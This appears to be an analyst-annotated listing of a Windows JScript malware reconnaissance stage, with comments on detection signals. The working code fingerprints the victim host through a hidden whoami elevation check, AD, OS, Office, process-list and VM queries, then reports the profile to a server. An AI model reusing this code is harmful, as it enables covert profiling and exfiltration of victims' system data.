/**
 * Reports whether the BIOS strings identify the host as a virtual machine.
 *
 * Runs `SELECT * FROM Win32_BIOS` through the shared `wmi` object (created
 * outside this listing) and lower-cases two fields per row: SerialNumber is
 * searched for 'parallels' / 'vmware', SMBIOSBIOSVersion for 'vmware' /
 * 'virtualbox'. Nothing else is inspected, so the verdict reflects only what
 * the SMBIOS strings advertise.
 *
 * Analysis notes: in this listing the result is only reported to the server
 * (is_vm***Yes / is_vm***No); it does not gate execution. A null SerialNumber
 * or SMBIOSBIOSVersion makes toLowerCase() throw, which the only caller
 * visible here absorbs in its own try/catch.
 *
 * @returns {boolean} true on the first matching row, false otherwise.
 */
function is_vm() {
    var rows = new Enumerator(wmi.ExecQuery('SELECT * FROM Win32_BIOS'));
    while (!rows.atEnd()) {
        var biosVersion = rows.item().SMBIOSBIOSVersion.toLowerCase();
        var serial = rows.item().SerialNumber.toLowerCase();
        var serialHit = serial.indexOf('parallels') !== -1 || serial.indexOf('vmware') !== -1;
        var versionHit = biosVersion.indexOf('vmware') !== -1 || biosVersion.indexOf('virtualbox') !== -1;
        if (serialHit || versionHit) {
            return true;
        }
        rows.moveNext();
    }
    return false;
}
/**
 * Reads the ComputerName property of the 'ADSystemInfo' COM object.
 *
 * Any exception (object cannot be created, property cannot be read) is
 * turned into `false`; the caller in this listing reports that as
 * 'adinformation***no_ad'. Creation of ADSystemInfo by a script host is a
 * directory-discovery signal worth correlating with the WMI queries issued
 * elsewhere in this file.
 *
 * @returns {*} the ComputerName value, or false on any error.
 */
function get_active_directory_information() {
    var computerName = false;
    try {
        computerName = new ActiveXObject('ADSystemInfo').ComputerName;
    } catch (e) {
        computerName = false;
    }
    return computerName;
}
/**
 * Expands an environment-variable expression through the shared `shell`
 * object (created outside this listing).
 *
 * @param {string} name - expression such as '%USERNAME%'.
 * @returns {*} whatever shell.ExpandEnvironmentStrings returns for `name`.
 */
function get_env_var(name) {
    var expanded = shell.ExpandEnvironmentStrings(name);
    return expanded;
}
/**
 * Fetches the WMI Win32_process instance whose Handle equals `pid`.
 *
 * The object path is built by plain concatenation, without quoting `pid`.
 * No caller of this helper appears in this listing.
 *
 * @param {*} pid - process identifier appended to the WMI object path.
 * @returns {*} whatever wmi.Get returns for that path.
 */
function getProc(pid) {
    var objectPath = 'Win32_process.Handle=' + pid;
    return wmi.Get(objectPath);
}
/**
 * Placeholder process-id lookup: always yields 0.
 *
 * Analysis note: because of this constant, the 'process_owner' field built
 * in get_system_information queries Win32_Process.Handle='0' rather than the
 * script host's own process, so that field should not be read as the identity
 * the script ran under.
 *
 * @returns {number} 0.
 */
function getPid() {
    var pid = 0;
    return pid;
}
/**
 * Looks up the Acrobat executable path from the registry default value at
 * HKCR\Software\Adobe\Acrobat\Exe\ via shell.RegRead.
 *
 * A missing key (RegRead throws) or an empty value both produce ''. The
 * `arch` parameter is accepted but never used. The presence or absence of a
 * path is reported to the server as the 'acrobat' field.
 *
 * @param {*} arch - unused.
 * @returns {*} the registry value when truthy, otherwise ''.
 */
function acrobat(arch) {
    try {
        var exePath = shell.RegRead("HKCR\\Software\\Adobe\\Acrobat\\Exe\\");
        if (exePath) {
            return exePath;
        }
    } catch (e) {
        // Deliberately ignored: an unreadable key is reported as ''.
    }
    return '';
}
/**
 * Fingerprints an Office application by instantiating its automation class.
 *
 * Builds "<Name>_<Version>_<bitness>" from the COM object's Name and Version.
 * Bitness is 'x86' unless `arch` starts with '64' AND the executable exists
 * under C:\Program Files\Microsoft Office\Office<major>\, in which case it is
 * 'x64'. Only that one install path is probed.
 *
 * Analysis notes:
 *  - Every exception is swallowed. A failure before any property is read
 *    yields ''; a failure after Name/Version were read (for example a null
 *    `arch`) yields the partial "<Name>_<Version>_".
 *  - Quit is the last statement in the try block, so any earlier exception
 *    skips it and the automation instance is not asked to exit.
 *  - A script host creating Office automation objects with no document
 *    involved is a useful hunting signal.
 *
 * @param {string} aclass - COM class name, e.g. "Word.Application".
 * @param {string} exe - executable file name probed under Program Files.
 * @param {string} arch - OS architecture string; only its first two
 *     characters are examined.
 * @returns {string} the fingerprint, a partial fingerprint, or ''.
 */
function officeApp(aclass, exe, arch){
    var summary = '';
    try {
        var app = new ActiveXObject(aclass);
        summary = app.Name + "_" + app.Version + "_";
        var major = app.Version.split('.')[0];
        var bitness;
        if (arch.substr(0, 2) !== '64') {
            bitness = 'x86';
        } else if (fso.FileExists("C:\\Program Files\\Microsoft Office\\Office" + major + "\\" + exe)) {
            bitness = 'x64';
        } else {
            bitness = 'x86';
        }
        summary += bitness;
        app.Quit(0, 0, 0);
    } catch (e) {
        // Deliberately ignored: whatever was collected so far is returned.
    }
    return summary;
}
/**
 * Fingerprints Outlook by delegating to officeApp with the
 * "Outlook.Application" class and the OUTLOOK.EXE image name.
 *
 * @param {string} arch - OS architecture string, passed through unchanged.
 * @returns {string} whatever officeApp returns.
 */
function outlook(arch) {
    var automationClass = "Outlook.Application";
    var imageName = "OUTLOOK.EXE";
    return officeApp(automationClass, imageName, arch);
}
/**
 * Fingerprints Word by delegating to officeApp with the "Word.Application"
 * class and the WINWORD.EXE image name.
 *
 * @param {string} arch - OS architecture string, passed through unchanged.
 * @returns {string} whatever officeApp returns.
 */
function word(arch) {
    var automationClass = "Word.Application";
    var imageName = "WINWORD.EXE";
    return officeApp(automationClass, imageName, arch);
}
/**
 * Fingerprints Excel by delegating to officeApp with the "Excel.Application"
 * class and the EXCEL.EXE image name.
 *
 * @param {string} arch - OS architecture string, passed through unchanged.
 * @returns {string} whatever officeApp returns.
 */
function excel(arch) {
    var automationClass = "Excel.Application";
    var imageName = "EXCEL.EXE";
    return officeApp(automationClass, imageName, arch);
}
/**
 * Builds the host profile that this script reports to its server.
 *
 * Output format: fields are "name***value" strings joined with "^^". The
 * field names and both delimiters are fixed literals, which makes them
 * stable anchors for content signatures on captured traffic or script text.
 *
 * Collection runs in three independent try blocks. When one throws, the
 * fields gathered so far are kept, an 'errorN***code_error' marker is
 * appended, and the next stage still runs, so a captured report also shows
 * which stage failed on the victim host:
 *   stage 0 - user and host name, elevation check, process owner, AD info,
 *             Win32_ComputerSystem (domain membership, DNS name, model)
 *   stage 1 - Win32_OperatingSystem, Win32_DesktopMonitor, the EnableLUA
 *             policy value, Office and Acrobat fingerprints
 *   stage 2 - full process list (name!pid joined with '@') and the VM check
 *
 * Detection notes:
 *  - The elevation check spawns `cmd /c whoami /groups | find "12288"` with a
 *    hidden window and waits for it; 12288 is the RID of the High Mandatory
 *    Level group (S-1-16-12288). That command line under a script-host
 *    parent is a high-signal process-creation event.
 *  - 'process_owner' queries Win32_Process.Handle='<getPid()>'; getPid() is
 *    defined elsewhere in this file.
 *  - 'os_registered_key' carries Win32_OperatingSystem.SerialNumber, despite
 *    the label.
 *
 * @returns {string} the "^^"-joined report.
 */
function get_system_information() {
    var fields = [];
    var rows;

    // Stage 0: identity, privilege and domain context.
    try {
        fields.push('username***' + get_env_var('%USERNAME%'));
        fields.push('hostname***' + get_env_var('%COMPUTERNAME%'));

        // Window style 0 = hidden, third argument 1 = wait for the exit code.
        var whoamiExit = shell.Run('cmd /c whoami /groups | find "12288"', 0, 1);
        fields.push('elevated***' + (whoamiExit == 0 ? 'yes' : 'no'));

        var owner = wmi.ExecMethod("Win32_Process.Handle='" + getPid() + "'", "GetOwner");
        fields.push('process_owner***' + (owner ? owner.Domain + '\\' + owner.User : 'no'));

        var adName = get_active_directory_information();
        fields.push(adName ? 'adinformation***' + adName : 'adinformation***no_ad');

        rows = new Enumerator(wmi.ExecQuery('Select * from Win32_ComputerSystem'));
        while (!rows.atEnd()) {
            var cs = rows.item();
            fields.push(cs.PartOfDomain ? 'part_of_domain***yes' : 'part_of_domain***no');
            fields.push('pc_domain***' + cs.Domain);
            fields.push('pc_dns_host_name***' + cs.DNSHostName);
            fields.push('pc_model***' + cs.Model);
            rows.moveNext();
        }
    } catch (e) {
        fields.push('error0***code_error');
    }

    // Stage 1: operating system, display, UAC policy, installed applications.
    try {
        rows = new Enumerator(wmi.ExecQuery('select * from win32_OperatingSystem'));
        var arch = null;
        while (!rows.atEnd()) {
            var os = rows.item();
            fields.push('os_name***' + os.Name);
            fields.push('os_build_number***' + os.BuildNumber);
            fields.push('os_version***' + os.Version);
            fields.push('os_sp***' + os.ServicePackMajorVersion);
            fields.push('os_memory***' + os.TotalVirtualMemorySize);
            fields.push('os_free_memory***' + os.FreePhysicalMemory);
            fields.push('os_registered_user***' + os.RegisteredUser);
            fields.push('os_registered_org***' + os.Organization);
            fields.push('os_registered_key***' + os.SerialNumber);
            fields.push('os_last_boot***' + os.LastBootUpTime);
            fields.push('os_install_date***' + os.InstallDate);
            arch = os.OSArchitecture;
            fields.push('os_arch***' + arch);
            fields.push('os_product_type***' + os.ProductType);
            fields.push('os_language_code***' + os.OSLanguage);
            fields.push('os_timezone***' + os.CurrentTimeZone);
            fields.push('os_number_of_users***' + os.NumberOfUsers);
            rows.moveNext();
        }

        rows = new Enumerator(wmi.ExecQuery('select * from Win32_DesktopMonitor'));
        while (!rows.atEnd()) {
            var monitor = rows.item();
            fields.push('dm_type***' + monitor.MonitorType);
            fields.push('dm_screen_size***' + monitor.ScreenWidth + 'x' + monitor.ScreenHeight);
            rows.moveNext();
        }

        var enableLua = shell.RegRead('HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA');
        fields.push(enableLua == 1 ? 'uac_level***yes' : 'uac_level***no');

        // arch stays null when the OS query returned no rows.
        fields.push("outlook***" + outlook(arch));
        fields.push("word***" + word(arch));
        fields.push("excel***" + excel(arch));
        fields.push("acrobat***" + acrobat(arch));
    } catch (e) {
        fields.push('error1***code_error');
    }

    // Stage 2: running processes and the virtual-machine verdict.
    try {
        rows = new Enumerator(wmi.ExecQuery('select * from win32_process'));
        var processes = [];
        while (!rows.atEnd()) {
            var proc = rows.item();
            processes.push(proc.name + '!' + proc.processid);
            rows.moveNext();
        }
        fields.push('process_list***' + processes.join('@'));
        fields.push(is_vm() ? 'is_vm***Yes' : 'is_vm***No');
    } catch (e) {
        fields.push('error2***code_error');
    }

    return fields.join('^^');
}
// Reporting step: the profile string is URL-encoded and handed to send_data
// (defined outside this listing) as the `info` parameter of a
// 'page_id=add_info' request. The literal 'page_id=add_info&info=' prefix is a
// stable anchor for network or proxy-log signatures.
// NOTE(review): the meaning of the 'request' and `true` arguments cannot be
// determined from this listing; confirm against send_data's definition.
send_data('request', 'page_id=add_info&info=' + encodeURIComponent(get_system_information()), true);